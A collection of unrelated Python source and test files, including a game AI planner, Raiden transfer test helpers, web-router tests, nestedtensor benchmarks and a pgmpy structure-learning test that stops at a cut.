_loop_until = ''
_set_flags = ''
elif _action_name:
add_action(life, _action_name, _desire, _require, _satisfies, _loop_until, _execute, _set_flags, _non_critical)
_action_name = ''
_desire = ''
_require = ''
_tier = ''
_loop_until = ''
_set_flags = ''
_execute = ''
_satisfies = ''
_non_critical = False
def find_actions_that_satisfy(life, desires, debug=False):
_valid_actions = []
for action in life['goap_actions']:
_break = False
#_run_anyways = False
for desire in desires:
_continue_instead = False
if desire.startswith('-'):
continue
elif desire.startswith('*'):
_continue_instead = True
#elif desire.startswith('+'):
# _run_anyways = True
_desire = desire.replace('-', '').replace('*', '')
if not _desire in life['goap_actions'][action]['satisfies']:
if _continue_instead:
continue
else:
if debug:
print 'action %s failed to meet the desires of %s' % (action, _desire)
_break = True
break
if _break:
continue
if len(life['goap_actions'][action]['require'][0]):
for requirement in life['goap_actions'][action]['require']:
_requirement = requirement
if _requirement.startswith('!'):
_requirement = _requirement[1:]
_true = False
else:
_true = True
if not FUNCTION_MAP[_requirement](life) == _true:
if debug:
print '\tFailed at:%s' % _requirement
_break = True
break
elif debug:
print '\tPassed:%s' % _requirement
if _break:
continue
_looping = False
for loop_until_func in life['goap_actions'][action]['loop_until']:
if not loop_until_func:
raise Exception('Error in loop_until for action: %s' % action)
if not execute(life, loop_until_func):
_looping = True
if _looping:
_valid_actions.append(action)
break
if _valid_actions and life['goap_actions'][_valid_actions[0]]['desire']:
_valid_actions.extend(find_actions_that_satisfy(life, life['goap_actions'][_valid_actions[0]]['desire']))
#print 'Valid:', _valid_actions
return _valid_actions
def has_valid_plan_for_goal(life, goal_name, debug=False):
_debug = debug == goal_name
_plan = find_actions_that_satisfy(life, life['goap_goals'][goal_name]['desire'], debug=_debug)
_plan.reverse()
#Revise
_check_next = False
for action in _plan[:]:
if life['goap_actions'][action]['non_critical']:
_check_next = True
elif _check_next:
_break = False
for loop_until_func in life['goap_actions'][action]['loop_until']:
if not FUNCTION_MAP[loop_until_func](life):
_break = True
break
if not _break:
_plan.remove(action)
_check_next = False
return _plan
def execute(life, func):
_true = True
_self_call = False
while 1:
if func.startswith('!'):
func = func[1:]
_true = False
elif func.startswith('%'):
func = func[1:]
_self_call = True
elif func.startswith('-'):
func = func[1:]
elif func.startswith('*'):
func = func[1:]
else:
break
if func == 'set_raid_location':
print 'CHECKS OUT' * 100
if _self_call:
if FUNCTION_MAP[func]() == _true:
return True
elif FUNCTION_MAP[func](life) == _true:
return True
return False
def execute_plan(life, plan):
for action in plan:
_actions = len(life['actions'])
#try:
if not FUNCTION_MAP[life['goap_actions'][action]['execute']](life):
break
if not life['state_action'] == life['goap_actions'][action]['execute']:
life['path'] = []
life['state_action'] = life['goap_actions'][action]['execute']
#except KeyError:
# raise Exception('Invalid function in life type \'%s\' for action \'%s\': %s' % (life['species'], action, life['goap_actions'][action]['execute']))
def get_next_goal(life, debug=False):
_next_goal = {'highest': None, 'goal': None, 'plan': None}
for goal in life['goap_goals']:
_break = False
if debug == goal:
print
print goal
if len(life['goap_goals'][goal]['require'][0]):
for requirement in life['goap_goals'][goal]['require']:
_requirement = requirement
_single = False
if _requirement.startswith('!'):
_requirement = _requirement[1:]
_true = False
else:
_true = True
if _requirement.startswith('%'):
_requirement = _requirement[1:]
_single = True
if _single:
_func = FUNCTION_MAP[_requirement]()
else:
_func = FUNCTION_MAP[_requirement](life)
if not _func == _true:
if debug == goal:
print '\tFailed at:%s' % _requirement
_break = True
break
elif debug == goal:
print '\tPassed:%s' % _requirement
#elif SETTINGS['following'] == life['id']:
# print '[state_%s] Requirement passed: %s (wanted %s)' % (goal, _requirement, _true)
# print FUNCTION_MAP[_requirement](life)
# print 'vis threats', [LIFE[l]['name'] for l in life['seen']], alife.judgement.get_visible_threats(life)
if _break:
continue
for desire in life['goap_goals'][goal]['desire']:
if '*' in desire:
continue
if execute(life, desire):
_loop = False
if life['goap_goals'][goal]['loop_until'] and len(life['goap_goals'][goal]['loop_until'][0]):
_loop = True
for func in life['goap_goals'][goal]['loop_until']:
if execute(life, func):
_loop = False
break
if not _loop:
_break = True
break
if _break:
continue
_plan = has_valid_plan_for_goal(life, goal, debug=debug)
if not _plan:
_plan = ['idle']
if _plan and life['goap_goals'][goal]['tier'] > _next_goal['highest']:
_next_goal['highest'] = life['goap_goals'][goal]['tier']
_next_goal['goal'] = goal
_next_goal['plan'] = _plan
#elif not _plan:
# logging.warning('Failed to find plan for goal \'%s\'.' % goal)
return _next_goal['goal'], _next_goal['highest'], _next_goal['plan']
def think(life):
_goal_name = life['state']
#TODO: Cache this
_plan = has_valid_plan_for_goal(life, _goal_name)
execute_plan(life, _plan)
|
412599
|
from .extract_patches import extract_tensor_patches, ExtractTensorPatches
from .max_blur_pool import max_blur_pool2d, MaxBlurPool2d
__all__ = ["extract_tensor_patches", "max_blur_pool2d", "ExtractTensorPatches", "MaxBlurPool2d"]
|
412613
|
from dataclasses import dataclass, replace
from hypothesis.strategies import builds, composite, integers, sampled_from
from raiden.messages.decode import lockedtransfersigned_from_message
from raiden.messages.encode import message_from_sendevent
from raiden.messages.transfers import LockedTransfer
from raiden.tests.utils import factories
from raiden.transfer.identifiers import CanonicalIdentifier
from raiden.transfer.mediated_transfer.events import (
SendLockedTransfer,
SendSecretRequest,
SendSecretReveal,
SendUnlock,
)
from raiden.transfer.mediated_transfer.initiator import send_lockedtransfer
from raiden.transfer.mediated_transfer.state import (
LockedTransferSignedState,
TransferDescriptionWithSecretState,
)
from raiden.transfer.mediated_transfer.state_change import (
ActionInitInitiator,
ActionInitTarget,
ReceiveSecretRequest,
ReceiveSecretReveal,
)
from raiden.transfer.state import HopState, NettingChannelState, RouteState
from raiden.transfer.state_change import ReceiveUnlock
from raiden.utils.signer import LocalSigner
from raiden.utils.typing import (
MYPY_ANNOTATION,
Address,
Any,
BlockNumber,
List,
MessageID,
PrivateKey,
)
def signed_transfer_from_description(
private_key: PrivateKey,
description: TransferDescriptionWithSecretState,
channel: NettingChannelState,
message_id: MessageID,
block_number: BlockNumber,
route_state: RouteState,
route_states: List[RouteState],
) -> LockedTransferSignedState:
send_locked_transfer = send_lockedtransfer(
transfer_description=description,
channel_state=channel,
message_identifier=message_id,
block_number=block_number,
route_state=route_state,
route_states=route_states,
)
message = message_from_sendevent(send_locked_transfer)
assert isinstance(message, LockedTransfer), MYPY_ANNOTATION
message.sign(LocalSigner(private_key))
return lockedtransfersigned_from_message(message)
def action_init_initiator_to_action_init_target(
action: ActionInitInitiator,
channel: NettingChannelState,
block_number: BlockNumber,
route_state: RouteState,
address: Address,
private_key: PrivateKey,
) -> ActionInitTarget:
transfer = signed_transfer_from_description(
private_key=private_key,
description=action.transfer,
channel=channel,
message_id=factories.make_message_identifier(),
block_number=block_number,
route_state=route_state,
route_states=action.routes,
)
from_hop = HopState(node_address=address, channel_identifier=channel.identifier)
return ActionInitTarget(
from_hop=from_hop, transfer=transfer, sender=address, balance_proof=transfer.balance_proof
)
@dataclass(frozen=True)
class SendSecretRequestInNode:
event: SendSecretRequest
node: Address
def send_secret_request_to_receive_secret_request(
source: SendSecretRequestInNode,
) -> ReceiveSecretRequest:
return ReceiveSecretRequest(
sender=source.node,
payment_identifier=source.event.payment_identifier,
amount=source.event.amount,
expiration=source.event.expiration,
secrethash=source.event.secrethash,
)
@dataclass(frozen=True)
class SendSecretRevealInNode:
event: SendSecretReveal
node: Address
def send_secret_reveal_to_recieve_secret_reveal(
source: SendSecretRevealInNode,
) -> ReceiveSecretReveal:
return ReceiveSecretReveal(
sender=source.node, secrethash=source.event.secrethash, secret=source.event.secret
)
@dataclass(frozen=True)
class SendLockedTransferInNode:
event: SendLockedTransfer
action: ActionInitInitiator
node: Address
private_key: PrivateKey
def send_lockedtransfer_to_locked_transfer(source: SendLockedTransferInNode) -> LockedTransfer:
locked_transfer = message_from_sendevent(source.event)
assert isinstance(locked_transfer, LockedTransfer), MYPY_ANNOTATION
locked_transfer.sign(LocalSigner(source.private_key))
return locked_transfer
def locked_transfer_to_action_init_target(locked_transfer: LockedTransfer) -> ActionInitTarget:
from_transfer = lockedtransfersigned_from_message(locked_transfer)
channel_id = from_transfer.balance_proof.channel_identifier # pylint: disable=no-member
from_hop = HopState(
node_address=Address(locked_transfer.initiator), channel_identifier=channel_id
)
init_target_statechange = ActionInitTarget(
from_hop=from_hop,
transfer=from_transfer,
balance_proof=from_transfer.balance_proof,
sender=from_transfer.balance_proof.sender, # pylint: disable=no-member
)
return init_target_statechange
@dataclass(frozen=True)
class SendUnlockInNode:
event: SendUnlock
node: Address
private_key: PrivateKey
def send_unlock_to_receive_unlock(
source: SendUnlockInNode, canonical_identifier: CanonicalIdentifier
) -> ReceiveUnlock:
mirrored_balance_proof = replace(
source.event.balance_proof, canonical_identifier=canonical_identifier
)
signed_balance_proof = factories.make_signed_balance_proof_from_unsigned(
unsigned=mirrored_balance_proof, signer=LocalSigner(source.private_key)
)
return ReceiveUnlock(
sender=source.node,
message_identifier=source.event.message_identifier,
secret=source.event.secret,
secrethash=source.event.secrethash,
balance_proof=signed_balance_proof,
)
@dataclass
class Scrambling:
field: str
value: Any
@property
def kwargs(self):
return {self.field: self.value}
@composite
def scrambling(draw, fields):
field = draw(sampled_from(list(fields.keys())))
value = draw(fields[field])
return Scrambling(field, value)
@composite
def balance_proof_scrambling(draw):
fields = {
"nonce": builds(factories.make_nonce),
"transferred_amount": integers(min_value=0),
"locked_amount": integers(min_value=0),
"locksroot": builds(factories.make_locksroot),
"canonical_identifier": builds(factories.make_canonical_identifier),
"balance_hash": builds(factories.make_transaction_hash),
}
return draw(scrambling(fields)) # pylint: disable=no-value-for-parameter
@composite
def hash_time_lock_scrambling(draw):
fields = {
"amount": integers(min_value=0),
"expiration": integers(min_value=1),
"secrethash": builds(factories.make_secret_hash),
}
return draw(scrambling(fields)) # pylint: disable=no-value-for-parameter
@composite
def locked_transfer_scrambling(draw):
fields = {
"token": builds(factories.make_token_address),
"token_network_address": builds(factories.make_token_network_address),
"channel_identifier": builds(factories.make_channel_identifier),
"chain_id": builds(factories.make_chain_id),
}
return draw(scrambling(fields)) # pylint: disable=no-value-for-parameter
|
412663
|
import pytest
from cocopot.routing import Router
from cocopot.exceptions import BadRequest, NotFound, MethodNotAllowed
def test_basic_routing():
r = Router()
r.add('/', endpoint='index')
r.add('/foo', endpoint='foo')
r.add('/bar/', endpoint='bar')
assert r.match('/') == ('index', {})
assert r.match('/foo') == ('foo', {})
assert r.match('/bar/') == ('bar', {})
pytest.raises(NotFound, lambda: r.match('/blub'))
pytest.raises(MethodNotAllowed, lambda: r.match('/foo', method='POST'))
def test_basic_routing2():
r = Router(strict=True)
r.add('/', endpoint='index')
r.add('/foo', endpoint='foo')
r.add('/bar/', endpoint='bar')
assert r.match('/') == ('index', {})
assert r.match('/foo') == ('foo', {})
assert r.match('/bar/') == ('bar', {})
pytest.raises(NotFound, lambda: r.match('/blub'))
pytest.raises(MethodNotAllowed, lambda: r.match('/foo', method='POST'))
def test_dynamic_routing():
r = Router()
r.add('/<name>', endpoint='index')
r.add('/foo/<string:name2>', endpoint='foo')
r.add('/bar/<int:bar>', endpoint='bar')
r.add('/float/<float:bar2>', endpoint='bar2')
r.add('/path/<path:bar3>', endpoint='bar3')
assert r.match('/foo') == ('index', {'name': 'foo'})
assert r.match('/foo/bar') == ('foo', {'name2': 'bar'})
assert r.match('/bar/20') == ('bar', {'bar': 20})
assert r.match('/float/20.333') == ('bar2', {'bar2': 20.333})
assert r.match('/path/foo/bar/xxx') == ('bar3', {'bar3': 'foo/bar/xxx'})
def test_default_values():
r = Router()
r.add('/<name>', endpoint='index', defaults={'foo': 1234, 'name':'bar'})
assert r.match('/foo') == ('index', {'name': 'foo', 'foo': 1234})
|
412665
|
from ..adapters.mssql import MSSQL
from .base import SQLRepresenter, JSONRepresenter
from . import representers, before_type, for_type
@representers.register_for(MSSQL)
class MSSQLRepresenter(SQLRepresenter, JSONRepresenter):
def _make_geoextra(self, field_type, srid):
geotype, params = field_type[:-1].split('(')
if params:
srid = params
return {'srid': srid}
@before_type('geometry')
def geometry_extras(self, field_type):
return self._make_geoextra(field_type, 0)
@for_type('geometry', adapt=False)
def _geometry(self, value, srid):
return "geometry::STGeomFromText('%s',%s)" % (value, srid)
@before_type('geography')
def geography_extras(self, field_type):
return self._make_geoextra(field_type, 4326)
@for_type('geography', adapt=False)
def _geography(self, value, srid):
return "geography::STGeomFromText('%s',%s)" % (srid, value)
|
412690
|
import logging
import tqdm
import numpy as np
def evaluate(model, tasks, iterator, cuda_device, split="val"):
'''Evaluate on a dataset'''
model.eval()
all_preds = {}
n_overall_examples = 0
for task in tasks:
n_examples = 0
task_preds, task_idxs, task_labels = [], [], []
if split == "val":
dataset = task.val_data
elif split == 'train':
dataset = task.train_data
elif split == "test":
dataset = task.test_data
generator = iterator(dataset, num_epochs=1, shuffle=False, cuda_device=cuda_device)
generator_tqdm = tqdm.tqdm(generator, total=iterator.get_num_batches(dataset), disable=True)
for batch in generator_tqdm:
tensor_batch = batch
out = model.forward(task, **tensor_batch)
n_examples += batch['label'].size()[0]
preds, _ = out['logits'].max(dim=1)
task_preds += list(preds.data.cpu().numpy())
task_labels += list(batch['label'].squeeze().data.cpu().numpy())
task_metrics = task.get_metrics(reset=True)
logging.info('\n***** TEST RESULTS *****')
for shot in ['Overall', 'Many', 'Medium', 'Few']:
logging.info(f" * {shot}: MSE {task_metrics[shot.lower()]['mse']:.3f}\t"
f"L1 {task_metrics[shot.lower()]['l1']:.3f}\t"
f"G-Mean {task_metrics[shot.lower()]['gmean']:.3f}\t"
f"Pearson {task_metrics[shot.lower()]['pearsonr']:.3f}\t"
f"Spearman {task_metrics[shot.lower()]['spearmanr']:.3f}\t"
f"Number {task_metrics[shot.lower()]['num_samples']}")
n_overall_examples += n_examples
task_preds = [min(max(np.float32(0.), pred * np.float32(5.)), np.float32(5.)) for pred in task_preds]
all_preds[task.name] = (task_preds, task_idxs)
return task_preds, task_labels, task_metrics['overall']['mse']
|
412720
|
import numpy as np
from analysis.analysis_utils import corr_frame_stim
from unittest import TestCase
class TestAnalysisUtils(TestCase):
def test_corr_frame_stim(self):
f = np.array([[0., 1], # Time, frame
[1., 2],
[2., 3],
[3., 5],
[4., 6],
[50., 7]])
s = np.array([[0.5, 99], # Time, stim
[1, 96],
[3, 91],
[7, 42]])
expected = np.array([[1., np.nan], # t = 0 No stim info.
[2., 96.], # t = 1 Stim newly updated.
[3., 96.], # t = 2 Use data at t = 1
[5., 91.], # t = 3 Stim newly updated.
[6., 91.], # t = 4 Use data at t = 6
[7., 42.]]) # t = 50 Use data at t = 7
self.assert_(np.allclose(corr_frame_stim(f, s), expected, equal_nan=True))
|
412748
|
def extractUntunedTranslation(item):
"""
"""
title = item['title'].replace(' III(', ' vol 3 (').replace(' III:', ' vol 3:').replace(' II:', ' vol 2:').replace(' I:', ' vol 1:').replace(' IV:', ' vol 4:').replace(
' V:', ' vol 5:')
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(title)
if not (chp or vol) or 'preview' in item['title'].lower():
return None
tagmap = [
('meg and seron', 'Meg and Seron', 'translated'),
('kino\'s journey', 'Kino\'s Journey', 'translated'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
if 'meg and seron' in item['tags'] and chp and vol:
return buildReleaseMessageWithType(item, 'Meg and Seron', vol, chp, frag=frag, postfix=postfix)
if 'lillia and treize' in item['tags'] and chp and vol:
return buildReleaseMessageWithType(item, 'Lillia to Treize', vol, chp, frag=frag, postfix=postfix)
return False
|
412767
|
from distutils.core import Extension
def get_extension():
return Extension(
'japronto.router.cmatcher',
sources=['cmatcher.c', 'match_dict.c', '../capsule.c'],
include_dirs=['.', '../request', '..', '../response'])
|
412796
|
import torch
import nestedtensor
import utils
import torch.nn.functional as F
import sys
import random
import argparse
import itertools
import re
import csv
Benchmarks = {}
def register_benchmark(fn):
Benchmarks[fn.__name__] = fn
#
# relu
#
@register_benchmark
def relu__tensor_iter(self):
def _relu_tensor_iter():
for t in self.inputs:
torch.nn.functional.relu_(t)
return _relu_tensor_iter
@register_benchmark
def relu__tensor_pad(self):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _relu_tensor_pad():
torch.nn.functional.relu_(tensor)
return _relu_tensor_pad
@register_benchmark
def relu__nt(self):
nt = nestedtensor.nested_tensor(self.inputs)
def _relu_nt():
torch.nn.functional.relu_(nt)
return _relu_nt
@register_benchmark
def relu_tensor_iter(self):
def _relu_tensor_iter():
for t in self.inputs:
torch.nn.functional.relu(t)
return _relu_tensor_iter
@register_benchmark
def relu_tensor_pad(self):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _relu_tensor_pad():
torch.nn.functional.relu(tensor)
return _relu_tensor_pad
@register_benchmark
def relu_nt(self):
nt = nestedtensor.nested_tensor(self.inputs)
def _relu_nt():
torch.nn.functional.relu(nt)
return _relu_nt
#
# conv2d
#
@register_benchmark
def conv2d_iter(self, module):
def _conv2d_tensor_iter():
for t in self.inputs:
module(t.unsqueeze(0)).squeeze(0)
return _conv2d_tensor_iter
@register_benchmark
def conv2d_pad(self, module):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _conv2d_tensor():
module(tensor)
return _conv2d_tensor
@register_benchmark
def conv2d_nt(self, module):
nt = nestedtensor.nested_tensor(self.inputs)
def _conv2d():
module(nt)
return _conv2d
#
# batch_norm
#
@register_benchmark
def batch_norm_tensor_iter(self, module):
def _batch_norm_tensor_iter():
for t in self.inputs:
module(t.unsqueeze(0)).squeeze(0)
return _batch_norm_tensor_iter
@register_benchmark
def batch_norm_tensor_pad(self, module):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _batch_norm_tensor_pad():
module(tensor)
return _batch_norm_tensor_pad
@register_benchmark
def batch_norm_nt(self, module):
nt = nestedtensor.nested_tensor(self.inputs)
def _batch_norm_nt():
module(nt)
return _batch_norm_nt
#
# max_pool2d
#
@register_benchmark
def max_pool2d_tensor_iter(self, module):
def _max_pool2d_tensor_iter():
for t in self.inputs:
module(t.unsqueeze(0)).squeeze(0)
return _max_pool2d_tensor_iter
@register_benchmark
def max_pool2d_tensor_pad(self, module):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _max_pool2d_tensor_pad():
module(tensor)
return _max_pool2d_tensor_pad
@register_benchmark
def max_pool2d_nt(self, module):
nt = nestedtensor.nested_tensor(self.inputs)
def _max_pool2d_nt():
module(nt)
return _max_pool2d_nt
#
# cross_entropy
#
@register_benchmark
def cross_entropy_tensor_iter(self):
def _cross_entropy_tensor_iter():
for a, b in zip(self.inputs, self.targets):
torch.nn.functional.cross_entropy(
a.unsqueeze(0), b.unsqueeze(0)
).squeeze(0)
return _cross_entropy_tensor_iter
@register_benchmark
def cross_entropy_tensor_pad(self):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
targets, _ = nestedtensor.nested_tensor(self.targets).to_tensor_mask()
def _cross_entropy_tensor_pad():
torch.nn.functional.cross_entropy(tensor, targets)
return _cross_entropy_tensor_pad
@register_benchmark
def cross_entropy_nt(self):
nt_input = nestedtensor.nested_tensor(self.inputs)
nt_targets = nestedtensor.nested_tensor(self.targets)
def _cross_entropy_nt():
torch.nn.functional.cross_entropy(nt_input, nt_targets)
return _cross_entropy_nt
#
# dropout
#
@register_benchmark
def dropout_tensor_iter(self):
def _dropout_tensor_iter():
for t in self.inputs:
torch.nn.functional.dropout(t.unsqueeze(0)).squeeze(0)
return _dropout_tensor_iter
@register_benchmark
def dropout_tensor_pad(self):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _dropout_tensor_pad():
torch.nn.functional.dropout(tensor)
return _dropout_tensor_pad
@register_benchmark
def dropout_nt(self):
nt = nestedtensor.nested_tensor(self.inputs)
def _dropout_nt():
torch.nn.functional.dropout(nt)
return _dropout_nt
#
# interpolate
#
@register_benchmark
def interpolate_tensor_iter(self):
def _interpolate_tensor_iter():
for t in self.inputs:
torch.nn.functional.interpolate(t, t.unsqueeze(0).shape[-2])
return _interpolate_tensor_iter
@register_benchmark
def interpolate_tensor_pad(self):
tensor, _ = nestedtensor.nested_tensor(self.inputs).to_tensor_mask()
def _interpolate_tensor_pad():
torch.nn.functional.interpolate(tensor, tensor[0].unsqueeze(0).shape[-2])
return _interpolate_tensor_pad
@register_benchmark
def interpolate_nt(self):
nt = nestedtensor.nested_tensor(self.inputs)
input_shape = [y[-2:] for y in nt.nested_size().unbind()]
def _interpolate_nt():
torch.nn.functional.interpolate(nt, input_shape)
return _interpolate_nt
class SegLayersBenchMark(object):
def __init__(self, args):
self.args = args
self.layers = {}
def get_benchmark(self, channels, name, cuda):
layer = None
if name.startswith("conv2d"):
m = re.match(r"conv2d_([a-z]+)_(\d+)x(\d+)", name)
if m is None:
raise ValueError("Unsupported parameterization for conv2d layer {}".format(name))
benchmark_kind = m.group(1)
k0 = int(m.group(2))
k1 = int(m.group(3))
# Parameters chosen based on dominant settings in
# https://github.com/pytorch/vision/blob/master/torchvision/models/segmentation/segmentation.py#L19
layer = self.layers.setdefault(
(name, channels, cuda), torch.nn.Conv2d(channels, channels, kernel_size=(k0, k1), dilation=2, bias=False)
)
name = "conv2d_" + benchmark_kind
if name.startswith("batch_norm"):
layer = self.layers.setdefault(
(name, cuda), torch.nn.BatchNorm2d(channels, 1e-05, 0.1).eval()
)
if name.startswith("max_pool2d"):
layer = self.layers.setdefault(
(name, cuda),
torch.nn.MaxPool2d(
kernel_size=(2, 2), stride=(2, 2), padding=(0, 0), dilation=(1, 1)
),
)
try:
if cuda and layer is not None:
layer.cuda()
return Benchmarks[name](self) if layer is None else Benchmarks[name](self, layer)
except KeyError:
raise ValueError("Benchmark {} is not supported. Available benchmarks are\n{}.".format(layer,
"\n".join(sorted(Benchmarks.keys()))))
def run(self):
params = itertools.product(
self.args.cuda,
self.args.N,
self.args.C,
self.args.H,
self.args.W,
self.args.seed,
)
if self.args.V:
var_params = [(v, v) for v in self.args.V]
else:
var_params = itertools.product(self.args.HV, self.args.WV)
params = [[p + v for v in var_params] for p in params]
params = sum(params, [])
writer = None
i = 0
for cuda, n, c, h, w, seed, h_var, w_var in params:
# generate inputs before iterating layers to have the same imput per layer
self.inputs, self.targets = self.get_input(cuda, n, c, h, w, h_var, w_var, seed)
benchmarks = [(layer, self.get_benchmark(c, layer, cuda)) for layer in self.args.layers]
for layer, benchmark in benchmarks:
result = utils.benchmark_fn(benchmark, run_time=self.args.run_time, warmup=self.args.warmup, cuda=cuda)
result["#"] = str(i) + "/" + str(len(benchmarks) * len(params))
result["N"] = n
result["C"] = c
result["H"] = h
result["W"] = w
result["h_var"] = h_var
result["w_var"] = w_var
result["seed"] = seed
result["avg_us"] = int(result["avg_us"])
result["std_us"] = int(result["std_us"])
result["name"] = layer
result["cuda"] = cuda
result["numel"] = sum(x.numel() for x in self.inputs)
if writer is None and self.args.csv_log:
writer = csv.DictWriter(open(self.args.csv_log, 'w'), fieldnames=result.keys())
writer.writeheader()
if writer is not None:
writer.writerow(result)
print(",".join(str((str(key), result[key])) for key in sorted(result.keys())))
i += 1
def get_input(self, cuda, n, c, h, w, h_var, w_var, seed):
inputs = []
targets = []
device = 'cpu'
if cuda:
device = 'cuda'
torch.manual_seed(seed)
random.seed(seed)
if cuda:
torch.cuda.init()
for _ in range(n):
h_res = max(1, int(random.gauss(h, h_var)))
w_res = max(1, int(random.gauss(w, w_var)))
input_i = torch.randn(c, h_res, w_res, device=device)
target_i = torch.randint(1, (h_res, w_res), dtype=torch.int64, device=device)
inputs.append(input_i)
targets.append(target_i)
if cuda:
# Synchronize copy operations so they don't influence the benchmark
torch.cuda.synchronize()
return inputs, targets
def main(args):
parser = argparse.ArgumentParser()
parser.add_argument("-L", dest="layers", type=str, nargs="+")
parser.add_argument("-N", dest="N", type=int, nargs="+")
parser.add_argument("-C", dest="C", type=int, nargs="+")
parser.add_argument("-H", dest="H", type=int, nargs="+")
parser.add_argument("-W", dest="W", type=int, nargs="+")
parser.add_argument("-HV", dest="HV", type=float, nargs="+")
parser.add_argument("-WV", dest="WV", type=float, nargs="+")
parser.add_argument("-V", dest="V", type=float, nargs="+")
parser.add_argument("-S", dest="seed", type=int, nargs="+")
parser.add_argument("--warmup", dest="warmup", type=float, default=2.0)
parser.add_argument("--run-time", dest="run_time", type=float, default=5.0)
parser.add_argument("--verbose", dest="verbose", type=int, default=0)
parser.add_argument("--csv-log", dest="csv_log", type=str)
parser.add_argument("--cuda", dest="cuda", type=str, nargs="+", default=["False"])
args = parser.parse_args()
for v in args.cuda:
if v not in ["False", "True"]:
raise ValueError("Argument --cuda may only be passed a list of True or False. Got {} instead.".format(args.cuda))
args.cuda = [True if c == "True" else False for c in args.cuda]
if args.V is not None:
if (args.HV is not None or args.WV is not None):
raise ValueError("If specifying variance for both H and W, arguments HV and WV must not be set.")
args.HV = args.V
args.WV = args.V
if args.verbose > 0:
print("called with: ", args)
benchmark_obj = SegLayersBenchMark(args)
benchmark_obj.run()
if __name__ == "__main__":
main(sys.argv[1:])
|
412812
|
from typing import Optional
import numpy as np
import torch
def torch_one_hot(target: torch.Tensor, num_classes: Optional[int] = None) -> torch.Tensor:
"""
Compute one hot encoding of input tensor
Args:
target: tensor to be converted
num_classes: number of classes. If :attr:`num_classes` is None,
the maximum of target is used
Returns:
torch.Tensor: one hot encoded tensor
"""
if num_classes is None:
num_classes = int(target.max().detach().item() + 1)
dtype, device = target.dtype, target.device
target_onehot = torch.zeros(*target.shape, num_classes, dtype=dtype, device=device)
return target_onehot.scatter_(1, target.unsqueeze_(1), 1.0)
def np_one_hot(target: np.ndarray, num_classes: Optional[int] = None) -> np.ndarray:
"""
Compute one hot encoding of input array
Args:
target: array to be converted
num_classes: number of classes
Returns:
numpy.ndarray: one hot encoded array
"""
if num_classes is None:
num_classes = int(target.max().item() + 1)
dtype = target.dtype
target_onehot = np.zeros((*target.shape, num_classes), dtype=dtype)
for c in range(num_classes):
target_onehot[..., c] = target == c
return target_onehot
|
412845
|
import unittest
import numpy as np
import pandas as pd
import networkx as nx
from pgmpy.models import BayesianNetwork
from pgmpy.estimators import TreeSearch
from pgmpy.factors.discrete import TabularCPD
from pgmpy.sampling import BayesianModelSampling
class TestTreeSearch(unittest.TestCase):
def setUp(self):
# set random seed
np.random.seed(0)
# test data for chow-liu
self.data12 = pd.DataFrame(
np.random.randint(low=0, high=2, size=(100, 5)),
columns=["A", "B", "C", "D", "E"],
)
# test data for chow-liu
model = BayesianNetwork(
[("A", "B"), ("A", "C"), ("B", "D"), ("B", "E"), ("C", "F")]
)
cpd_a = TabularCPD("A", 2, [[0.4], [0.6]])
cpd_b = TabularCPD(
"B",
3,
[[0.6, 0.2], [0.3, 0.5], [0.1, 0.3]],
evidence=["A"],
evidence_card=[2],
)
cpd_c = TabularCPD(
"C", 2, [[0.3, 0.4], [0.7, 0.6]], evidence=["A"], evidence_card=[2]
)
cpd_d = TabularCPD(
"D",
3,
[[0.5, 0.3, 0.1], [0.4, 0.4, 0.8], [0.1, 0.3, 0.1]],
evidence=["B"],
evidence_card=[3],
)
cpd_e = TabularCPD(
"E",
2,
[[0.3, 0.5, 0.2], [0.7, 0.5, 0.8]],
evidence=["B"],
evidence_card=[3],
)
cpd_f = TabularCPD(
"F",
3,
[[0.3, 0.6], [0.5, 0.2], [0.2, 0.2]],
evidence=["C"],
evidence_card=[2],
)
model.add_cpds(cpd_a, cpd_b, cpd_c, cpd_d, cpd_e, cpd_f)
inference = BayesianModelSampling(model)
self.data13 = inference.forward_sample(size=10000)
# test data for TAN
model = BayesianNetwork(
[
("A", "R"),
("A", "B"),
("A", "C"),
("A", "D"),
("A", "E"),
("R", "B"),
("R", "C"),
("R", "D"),
("R", "E"),
]
)
cpd_a = TabularCPD("A", 2, [[0.7], [0.3]])
cpd_r = TabularCPD(
"R",
3,
[[0.6, 0.2], [0.3, 0.5], [0.1, 0.3]],
evidence=["A"],
evidence_card=[2],
)
cpd_b = TabularCPD(
"B",
3,
[
[0.1, 0.1, 0.2, 0.2, 0.7, 0.1],
[0.1, 0.3, 0.1, 0.2, 0.1, 0.2],
[0.8, 0.6, 0.7, 0.6, 0.2, 0.7],
],
evidence=["A", "R"],
evidence_card=[2, 3],
)
cpd_c = TabularCPD(
"C",
2,
[[0.7, 0.2, 0.2, 0.5, 0.1, 0.3], [0.3, 0.8, 0.8, 0.5, 0.9, 0.7]],
evidence=["A", "R"],
evidence_card=[2, 3],
)
cpd_d = TabularCPD(
"D",
3,
[
[0.3, 0.8, 0.2, 0.8, 0.4, 0.7],
[0.4, 0.1, 0.4, 0.1, 0.1, 0.1],
[0.3, 0.1, 0.4, 0.1, 0.5, 0.2],
],
evidence=["A", "R"],
evidence_card=[2, 3],
)
cpd_e = TabularCPD(
"E",
2,
[[0.5, 0.6, 0.6, 0.5, 0.5, 0.4], [0.5, 0.4, 0.4, 0.5, 0.5, 0.6]],
evidence=["A", "R"],
evidence_card=[2, 3],
)
model.add_cpds(cpd_a, cpd_r, cpd_b, cpd_c, cpd_d, cpd_e)
inference = BayesianModelSampling(model)
self.data22 = inference.forward_sample(size=10000)
def test_estimate_chow_liu(self):
# learn tree structure using D as root node
for weight_fn in [
"mutual_info",
"adjusted_mutual_info",
"normalized_mutual_info",
]:
for n_jobs in [-1, 1]:
# learn graph structure
est = TreeSearch(self.data12, root_node="A", n_jobs=n_jobs)
dag = est.estimate(estimator_type="chow-liu", edge_weights_fn=weight_fn)
# check number of nodes and edges are as expected
